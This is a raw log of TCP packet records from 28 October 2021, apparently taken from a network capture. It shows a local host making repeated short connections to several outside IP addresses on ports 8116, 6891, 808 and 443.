Oct 28, 2021 05:11:49.417022943 CEST	49784	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:49.433269024 CEST	6891	49783	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:49.433290005 CEST	6891	49783	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:49.433403015 CEST	49783	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:49.436389923 CEST	49783	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:49.465645075 CEST	8116	49784	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:49.602756977 CEST	6891	49783	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:49.662990093 CEST	8116	49784	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:49.663008928 CEST	8116	49784	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:49.663227081 CEST	49784	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:49.663271904 CEST	49784	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:49.670412064 CEST	49784	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:49.718988895 CEST	8116	49784	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:50.457971096 CEST	49785	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:50.512064934 CEST	8116	49785	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:50.512182951 CEST	49785	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:50.513226986 CEST	49785	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:50.566304922 CEST	8116	49785	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:50.566523075 CEST	8116	49785	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:50.566622019 CEST	49785	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:50.567290068 CEST	49785	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:50.573313951 CEST	49785	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:50.573474884 CEST	49785	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:50.626543045 CEST	8116	49785	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:50.626564980 CEST	8116	49785	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:50.688391924 CEST	49786	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:50.688448906 CEST	443	49786	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:50.688534021 CEST	49786	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:50.689165115 CEST	49786	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:50.689198971 CEST	443	49786	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:50.818242073 CEST	8116	49785	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:50.818263054 CEST	8116	49785	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:50.818350077 CEST	49785	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:50.821551085 CEST	49785	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:50.874722004 CEST	8116	49785	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:51.205490112 CEST	443	49786	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:51.205581903 CEST	49786	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:51.206727982 CEST	49786	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:51.206753969 CEST	443	49786	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:51.213107109 CEST	49786	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:51.213143110 CEST	443	49786	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:51.213259935 CEST	49786	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:51.213279009 CEST	443	49786	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:51.842866898 CEST	49787	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:51.842911005 CEST	443	49787	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:51.843009949 CEST	49787	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:51.843992949 CEST	49787	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:51.844007969 CEST	443	49787	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:51.925512075 CEST	443	49786	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:51.925587893 CEST	443	49786	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:51.925679922 CEST	49786	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:51.933480024 CEST	49786	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:51.933520079 CEST	443	49786	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:52.337769032 CEST	443	49787	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:52.339344025 CEST	49787	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:52.339881897 CEST	49787	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:52.339905024 CEST	443	49787	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:52.347013950 CEST	49787	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:52.347054958 CEST	443	49787	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:52.347141027 CEST	49787	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:52.347151995 CEST	443	49787	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:53.000217915 CEST	49792	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:53.035198927 CEST	443	49787	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:53.035274982 CEST	443	49787	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:53.035353899 CEST	49787	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:53.038522959 CEST	49787	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:53.038554907 CEST	443	49787	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:53.169430971 CEST	808	49792	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:53.169560909 CEST	49792	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:53.170152903 CEST	49792	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:53.338027954 CEST	808	49792	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:53.338138103 CEST	808	49792	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:53.338255882 CEST	49792	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:53.339170933 CEST	49792	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:53.345905066 CEST	49792	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:53.346065044 CEST	49792	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:53.507481098 CEST	808	49792	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:53.514648914 CEST	808	49792	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:53.514699936 CEST	808	49792	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:53.514717102 CEST	808	49792	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:53.902595043 CEST	808	49792	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:53.902627945 CEST	808	49792	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:53.902688980 CEST	49792	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:53.902724028 CEST	49792	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:53.911027908 CEST	49792	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:54.079034090 CEST	808	49792	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:54.097187996 CEST	49794	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:54.255405903 CEST	808	49794	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:54.255655050 CEST	49794	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:54.256226063 CEST	49794	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:54.414721966 CEST	808	49794	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:54.414757013 CEST	808	49794	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:54.414865971 CEST	49794	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:54.415533066 CEST	49794	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:54.421113968 CEST	49794	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:54.421245098 CEST	49794	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:54.573406935 CEST	808	49794	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:54.578996897 CEST	808	49794	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:54.579041958 CEST	808	49794	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:54.579072952 CEST	808	49794	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:54.922043085 CEST	49795	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:54.968466043 CEST	808	49794	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:54.968489885 CEST	808	49794	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:54.968602896 CEST	49794	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:54.968725920 CEST	49794	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:54.973659039 CEST	49794	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:11:55.088535070 CEST	6891	49795	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:55.088706017 CEST	49795	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:55.090334892 CEST	49795	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:55.132499933 CEST	808	49794	143.244.140.214	192.168.2.3
Oct 28, 2021 05:11:55.256627083 CEST	6891	49795	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:55.256707907 CEST	6891	49795	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:55.256814003 CEST	49795	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:55.257585049 CEST	49795	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:55.266506910 CEST	49795	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:55.266647100 CEST	49795	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:55.432897091 CEST	6891	49795	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:55.432926893 CEST	6891	49795	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:55.815484047 CEST	6891	49795	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:55.815519094 CEST	6891	49795	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:55.815582991 CEST	49795	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:55.815627098 CEST	49795	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:55.823514938 CEST	49795	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:55.989847898 CEST	6891	49795	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:56.002829075 CEST	49796	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:56.169595957 CEST	6891	49796	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:56.169836998 CEST	49796	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:56.170578003 CEST	49796	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:56.336875916 CEST	6891	49796	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:56.336935997 CEST	6891	49796	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:56.337091923 CEST	49796	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:56.337678909 CEST	49796	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:56.342911005 CEST	49796	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:56.343002081 CEST	49796	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:56.509521961 CEST	6891	49796	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:56.509551048 CEST	6891	49796	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:56.844439030 CEST	49797	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:56.890779972 CEST	6891	49796	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:56.890811920 CEST	6891	49796	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:56.891019106 CEST	49796	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:56.893347979 CEST	49796	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:11:56.898801088 CEST	8116	49797	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:56.898950100 CEST	49797	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:56.899816036 CEST	49797	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:56.953131914 CEST	8116	49797	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:56.953330040 CEST	8116	49797	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:56.953602076 CEST	49797	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:56.953937054 CEST	49797	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:56.957612991 CEST	49797	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:56.957694054 CEST	49797	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:57.011050940 CEST	8116	49797	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:57.011217117 CEST	8116	49797	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:57.059765100 CEST	6891	49796	45.77.0.96	192.168.2.3
Oct 28, 2021 05:11:57.208345890 CEST	8116	49797	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:57.208374023 CEST	8116	49797	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:57.208488941 CEST	49797	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:57.208534956 CEST	49797	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:57.216748953 CEST	49797	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:57.270191908 CEST	8116	49797	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:57.920409918 CEST	49798	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:57.968554974 CEST	8116	49798	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:57.968660116 CEST	49798	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:57.969290018 CEST	49798	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:58.017121077 CEST	8116	49798	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:58.017519951 CEST	8116	49798	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:58.017607927 CEST	49798	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:58.018141985 CEST	49798	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:58.023031950 CEST	49798	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:58.023159027 CEST	49798	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:58.071098089 CEST	8116	49798	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:58.071713924 CEST	8116	49798	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:58.234414101 CEST	49799	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:58.234458923 CEST	443	49799	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:58.234533072 CEST	49799	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:58.235224962 CEST	49799	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:58.235235929 CEST	443	49799	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:58.241653919 CEST	8116	49798	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:58.241677999 CEST	8116	49798	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:58.241724014 CEST	49798	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:58.241772890 CEST	49798	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:58.244545937 CEST	49798	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:11:58.292484045 CEST	8116	49798	185.56.219.47	192.168.2.3
Oct 28, 2021 05:11:58.725239038 CEST	443	49799	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:58.725980997 CEST	49799	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:58.725997925 CEST	49799	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:58.726006985 CEST	443	49799	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:58.736332893 CEST	49799	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:58.736351967 CEST	443	49799	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:58.736485004 CEST	49799	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:58.736498117 CEST	443	49799	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:59.269254923 CEST	49800	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:59.269304991 CEST	443	49800	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:59.269417048 CEST	49800	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:59.269879103 CEST	49800	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:59.269898891 CEST	443	49800	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:59.426079035 CEST	443	49799	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:59.426157951 CEST	443	49799	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:59.426202059 CEST	49799	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:59.426260948 CEST	49799	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:59.433953047 CEST	49799	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:59.433979034 CEST	443	49799	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:59.756645918 CEST	443	49800	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:59.759969950 CEST	49800	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:59.760713100 CEST	49800	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:59.760730028 CEST	443	49800	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:59.767673016 CEST	49800	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:59.767693043 CEST	443	49800	192.46.210.220	192.168.2.3
Oct 28, 2021 05:11:59.767808914 CEST	49800	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:11:59.767819881 CEST	443	49800	192.46.210.220	192.168.2.3
Oct 28, 2021 05:12:00.455801964 CEST	443	49800	192.46.210.220	192.168.2.3
Oct 28, 2021 05:12:00.455881119 CEST	443	49800	192.46.210.220	192.168.2.3
Oct 28, 2021 05:12:00.455904007 CEST	49800	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:12:00.455943108 CEST	49800	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:12:00.458165884 CEST	49800	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:12:00.458182096 CEST	443	49800	192.46.210.220	192.168.2.3
Oct 28, 2021 05:12:00.501106977 CEST	49801	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:12:00.666096926 CEST	808	49801	143.244.140.214	192.168.2.3
Oct 28, 2021 05:12:00.666245937 CEST	49801	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:12:00.666810036 CEST	49801	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:12:00.831672907 CEST	808	49801	143.244.140.214	192.168.2.3
Oct 28, 2021 05:12:00.831978083 CEST	808	49801	143.244.140.214	192.168.2.3
Oct 28, 2021 05:12:00.832062960 CEST	49801	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:12:00.832571983 CEST	49801	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:12:00.836543083 CEST	49801	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:12:00.836587906 CEST	49801	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:12:00.997417927 CEST	808	49801	143.244.140.214	192.168.2.3
Oct 28, 2021 05:12:01.001436949 CEST	808	49801	143.244.140.214	192.168.2.3
Oct 28, 2021 05:12:01.001455069 CEST	808	49801	143.244.140.214	192.168.2.3
Oct 28, 2021 05:12:01.001467943 CEST	808	49801	143.244.140.214	192.168.2.3
Oct 28, 2021 05:12:01.509471893 CEST	49803	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:12:01.672373056 CEST	808	49803	143.244.140.214	192.168.2.3
Oct 28, 2021 05:12:01.672544003 CEST	49803	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:12:01.674889088 CEST	49803	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:12:01.837697983 CEST	808	49803	143.244.140.214	192.168.2.3
Oct 28, 2021 05:12:01.837771893 CEST	808	49803	143.244.140.214	192.168.2.3
Oct 28, 2021 05:12:01.837901115 CEST	49803	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:12:01.838538885 CEST	49803	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:12:01.844522953 CEST	49803	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:12:01.844558001 CEST	49803	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:12:02.001140118 CEST	808	49803	143.244.140.214	192.168.2.3
Oct 28, 2021 05:12:02.007288933 CEST	808	49803	143.244.140.214	192.168.2.3
Oct 28, 2021 05:12:02.007308960 CEST	808	49803	143.244.140.214	192.168.2.3
Oct 28, 2021 05:12:02.387631893 CEST	808	49803	143.244.140.214	192.168.2.3
Oct 28, 2021 05:12:02.387653112 CEST	808	49803	143.244.140.214	192.168.2.3
Oct 28, 2021 05:12:02.387820005 CEST	49803	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:12:02.387866020 CEST	49803	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:12:02.391120911 CEST	49803	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:12:02.416611910 CEST	808	49801	143.244.140.214	192.168.2.3
Oct 28, 2021 05:12:02.416630030 CEST	808	49801	143.244.140.214	192.168.2.3
Oct 28, 2021 05:12:02.416687012 CEST	49801	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:12:02.416727066 CEST	49801	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:12:02.422143936 CEST	49801	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:12:02.553915024 CEST	808	49803	143.244.140.214	192.168.2.3
Oct 28, 2021 05:12:02.586976051 CEST	808	49801	143.244.140.214	192.168.2.3
Oct 28, 2021 05:12:03.463000059 CEST	49804	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:12:03.629380941 CEST	6891	49804	45.77.0.96	192.168.2.3
Oct 28, 2021 05:12:03.629542112 CEST	49804	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:12:03.632705927 CEST	49804	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:12:03.798985958 CEST	6891	49804	45.77.0.96	192.168.2.3
Oct 28, 2021 05:12:03.799094915 CEST	6891	49804	45.77.0.96	192.168.2.3
Oct 28, 2021 05:12:03.799158096 CEST	49804	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:12:03.799603939 CEST	49804	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:12:03.803092957 CEST	49804	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:12:03.803189993 CEST	49804	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:12:03.974539042 CEST	6891	49804	45.77.0.96	192.168.2.3
Oct 28, 2021 05:12:04.353049994 CEST	6891	49804	45.77.0.96	192.168.2.3
Oct 28, 2021 05:12:04.353080034 CEST	6891	49804	45.77.0.96	192.168.2.3
Oct 28, 2021 05:12:04.353228092 CEST	49804	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:12:04.353275061 CEST	49804	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:12:04.621192932 CEST	49804	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:12:04.787631035 CEST	6891	49804	45.77.0.96	192.168.2.3
Oct 28, 2021 05:12:06.623415947 CEST	49805	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:12:06.677203894 CEST	8116	49805	185.56.219.47	192.168.2.3
Oct 28, 2021 05:12:06.677407980 CEST	49805	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:12:06.711817026 CEST	49805	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:12:06.764830112 CEST	8116	49805	185.56.219.47	192.168.2.3
Oct 28, 2021 05:12:06.765170097 CEST	8116	49805	185.56.219.47	192.168.2.3
Oct 28, 2021 05:12:06.765252113 CEST	49805	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:12:06.795787096 CEST	49805	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:12:06.800774097 CEST	49805	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:12:06.800888062 CEST	49805	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:12:06.853620052 CEST	8116	49805	185.56.219.47	192.168.2.3
Oct 28, 2021 05:12:06.854346991 CEST	8116	49805	185.56.219.47	192.168.2.3
Oct 28, 2021 05:12:07.026216984 CEST	8116	49805	185.56.219.47	192.168.2.3
Oct 28, 2021 05:12:07.026249886 CEST	8116	49805	185.56.219.47	192.168.2.3
Oct 28, 2021 05:12:07.026371002 CEST	49805	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:12:07.026423931 CEST	49805	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:12:07.035168886 CEST	49805	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:12:07.089701891 CEST	8116	49805	185.56.219.47	192.168.2.3
Oct 28, 2021 05:12:08.115231991 CEST	49806	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:12:08.115281105 CEST	443	49806	192.46.210.220	192.168.2.3
Oct 28, 2021 05:12:08.115537882 CEST	49806	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:12:08.117129087 CEST	49806	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:12:08.117144108 CEST	443	49806	192.46.210.220	192.168.2.3
Oct 28, 2021 05:12:08.638765097 CEST	443	49806	192.46.210.220	192.168.2.3
Oct 28, 2021 05:12:08.640548944 CEST	49806	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:12:08.652030945 CEST	49806	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:12:08.652069092 CEST	443	49806	192.46.210.220	192.168.2.3
Oct 28, 2021 05:12:08.656506062 CEST	49806	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:12:08.656526089 CEST	443	49806	192.46.210.220	192.168.2.3
Oct 28, 2021 05:12:08.656552076 CEST	49806	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:12:08.656563044 CEST	443	49806	192.46.210.220	192.168.2.3
Oct 28, 2021 05:12:09.372217894 CEST	443	49806	192.46.210.220	192.168.2.3
Oct 28, 2021 05:12:09.372328997 CEST	443	49806	192.46.210.220	192.168.2.3
Oct 28, 2021 05:12:09.372340918 CEST	49806	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:12:09.374644995 CEST	49806	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:12:09.374900103 CEST	49806	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:12:09.374922991 CEST	443	49806	192.46.210.220	192.168.2.3
Oct 28, 2021 05:12:10.453876972 CEST	49807	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:12:10.616800070 CEST	808	49807	143.244.140.214	192.168.2.3
Oct 28, 2021 05:12:10.617244959 CEST	49807	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:12:10.617863894 CEST	49807	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:12:10.780675888 CEST	808	49807	143.244.140.214	192.168.2.3
Oct 28, 2021 05:12:10.780816078 CEST	808	49807	143.244.140.214	192.168.2.3
Oct 28, 2021 05:12:10.785604954 CEST	49807	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:12:10.786046028 CEST	49807	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:12:10.789446115 CEST	49807	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:12:10.789529085 CEST	49807	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:12:10.948714018 CEST	808	49807	143.244.140.214	192.168.2.3
Oct 28, 2021 05:12:10.952184916 CEST	808	49807	143.244.140.214	192.168.2.3
Oct 28, 2021 05:12:10.952203989 CEST	808	49807	143.244.140.214	192.168.2.3
Oct 28, 2021 05:12:10.952281952 CEST	808	49807	143.244.140.214	192.168.2.3
Oct 28, 2021 05:12:11.350032091 CEST	808	49807	143.244.140.214	192.168.2.3
Oct 28, 2021 05:12:11.350058079 CEST	808	49807	143.244.140.214	192.168.2.3
Oct 28, 2021 05:12:11.353790045 CEST	49807	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:12:11.356548071 CEST	49807	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:12:11.519260883 CEST	808	49807	143.244.140.214	192.168.2.3
Oct 28, 2021 05:12:12.382265091 CEST	49808	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:12:12.547754049 CEST	6891	49808	45.77.0.96	192.168.2.3
Oct 28, 2021 05:12:12.548190117 CEST	49808	6891	192.168.2.3	45.77.0.96
